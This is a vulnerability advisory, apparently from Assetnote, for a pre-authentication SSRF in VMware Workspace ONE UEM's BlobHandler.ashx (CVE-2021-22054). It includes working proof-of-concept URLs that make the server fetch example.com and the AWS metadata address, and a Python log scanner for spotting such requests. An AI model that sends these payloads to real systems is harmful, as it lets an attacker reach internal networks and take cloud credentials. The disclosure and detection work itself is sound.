Apr 27, 2022
A pre-auth SSRF is present in VMWare Workspace ONE UEM (AirWatch) version 2105. Exploitation is possible due to hardcoded encryption parameters in the BlobHandler.ashx endpoint present in both the AirWatch Console and Catalog applications. When parsing a Url parameter encrypted with the hardcoded encryption parameters, the BlobHandler can be induced to proxy a request to any internal or external host reachable from the system hosting the Workspace ONE UEM application services, and to return the response to the attacker.
Due to the nature of the Catalog application, it is often exposed to the public Internet even when access to the AirWatch Console is restricted, which increases the impact of the vulnerability in such deployments.
The CVE for this issue is CVE-2021-22054. The advisory from VMWare can be found here.
An attacker can request arbitrary URLs on behalf of the VMWare Workspace One UEM server. HTTP requests with arbitrary methods and request bodies can be made. This could allow an attacker to pivot to the internal network and/or request cloud metadata endpoints to obtain cloud credentials.
Taken from VMWare’s advisory:
Fixed Version(s) and Release Notes:
VMware Workspace ONE UEM console 2105
https://resources.workspaceone.com/view/7xw2l35h6fc2pyfjgcnx/en
https://docs.vmware.com/en/VMware-Workspace-ONE-UEM/2105/rn/Workspace-ONE-UEM-2105-Release-Notes.html
VMware Workspace ONE UEM console 2102
https://resources.workspaceone.com/view/48ktw9p6spmq8dflll49/en
https://docs.vmware.com/en/VMware-Workspace-ONE-UEM/2102/rn/Workspace-ONE-UEM-2102-Release-Notes.html
VMware Workspace ONE UEM console 2011
https://resources.workspaceone.com/view/pdwkjgfsb8b57cxvfnpd/en
https://docs.vmware.com/en/VMware-Workspace-ONE-UEM/2011/rn/VMware-Workspace-ONE-UEM-Release-Notes-2011.html
VMware Workspace ONE UEM console 2008
https://resources.workspaceone.com/view/5qtfg6xhrkcp6vp4t4l7/en
https://docs.vmware.com/en/VMware-Workspace-ONE-UEM/2008/rn/VMware-Workspace-ONE-UEM-Release-Notes-2008.html
Mitre CVE Dictionary Links:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22054
FIRST CVSSv3 Calculator:
CVE-2021-22054 - https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Workspace ONE UEM (formerly known as AirWatch) provides a comprehensive enterprise mobility platform that delivers simplified access to enterprise applications, secures corporate data, and allows mobile productivity. It also works with the public application stores to handle the provisioning of native mobile applications to mobile devices.
Workspace ONE UEM provides compliance-checking tools to ensure that remote access devices meet corporate security standards. For Office 365, through its integration with the Office 365 Graph API, it can manage the DLP settings across the suite of Office applications.
The remediation details provided in VMWare’s advisory are satisfactory and will ensure that this vulnerability cannot be exploited.
The knowledge base article detailing the patches or workaround to apply can be found here.
SSRFs:
The following URLs will request http://example.com through the SSRF:
http://airwatch/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A
http://airwatch/AirWatch/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A
Hitting the AWS metadata IP (http://169.254.169.254/latest/meta-data/) through this SSRF:
http://airwatch/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgBhADIAZAAzAEYAcgA2AEcAZAAzAEkAOAB1AGkAeQBzADoARQBLAHoAUABnAG4ASwBUAG8ANABwAE4ALwBLAHMASgBMAGUAcQBwAHIATgBGAG4AMABVAG8AZABVAG8AdABaADUANwBrADIAcgBtAGoASABTAHYAMgBPADUAUAAvADMAeQB0AGMAVQB1AGgAawBzAGsAUwBtAE8AWAArACsAUwBpAFMAcQBZAFkAKwBoAHIAMgBBAEMASAA=
http://airwatch/AirWatch/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgBhADIAZAAzAEYAcgA2AEcAZAAzAEkAOAB1AGkAeQBzADoARQBLAHoAUABnAG4ASwBUAG8ANABwAE4ALwBLAHMASgBMAGUAcQBwAHIATgBGAG4AMABVAG8AZABVAG8AdABaADUANwBrADIAcgBtAGoASABTAHYAMgBPADUAUAAvADMAeQB0AGMAVQB1AGgAawBzAGsAUwBtAE8AWAArACsAUwBpAFMAcQBZAFkAKwBoAHIAMgBBAEMASAA=
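An added detection example for defenders, written for this page and not taken from the advisory or from VMware's code: it scans web-server access-log lines for pre-auth requests to BlobHandler.ashx that carry a Url parameter and decodes the value for triage. The example.com PoC payload above is base64 of UTF-16LE text beginning awev2:kv0:, so decoded values are split on colons and surfaced; the log lines are constructed, the prefix check is an assumption drawn only from the two PoC payloads on this page, and the meaning of the individual fields is not documented here.

```python
import base64
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not from the advisory). The Url value in the
# first line is the example.com PoC payload quoted in the advisory text.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Apr/2022:10:00:00 +0000] "GET /Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A HTTP/1.1" 200 1256
10.0.0.6 - - [27/Apr/2022:10:00:01 +0000] "GET /Catalog/Home HTTP/1.1" 200 512
10.0.0.7 - - [27/Apr/2022:10:00:02 +0000] "GET /AirWatch/BlobHandler.ashx?Url=notbase64 HTTP/1.1" 400 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Both PoC payloads on this page decode to UTF-16LE text starting with this
# prefix; treating it as a marker is an assumption based on those two samples.
POC_PREFIX = "awev2:"


def decode_blob_url(value: str) -> Optional[str]:
    """Base64-decode a BlobHandler Url value and read it as UTF-16LE text."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def inspect_line(line: str) -> Optional[dict]:
    """Return a finding for a BlobHandler.ashx request carrying a Url value, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith("/blobhandler.ashx"):
        return None
    query = {k.lower(): v for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    for value in query.get("url", []):
        value = value.replace(" ", "+")  # parse_qs maps '+' to ' '; restore the base64 alphabet
        text = decode_blob_url(value)
        fields = text.split(":", 3) if text and text.startswith(POC_PREFIX) else None
        return {"method": m.group("method"), "path": parts.path,
                "matches_poc_format": fields is not None, "fields": fields}
    return None


def scan_log(text: str) -> list:
    """Run inspect_line over every line and collect the findings."""
    return [f for f in (inspect_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Any hit from an untrusted source address is worth investigating regardless of whether the value decodes, since the endpoint is reachable without authentication on affected versions.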
The blog post detailing the steps taken for the discovery of this vulnerability can be found here.
Assetnote Security Research Team and Keiran Sampson
The timeline for this disclosure process can be found below: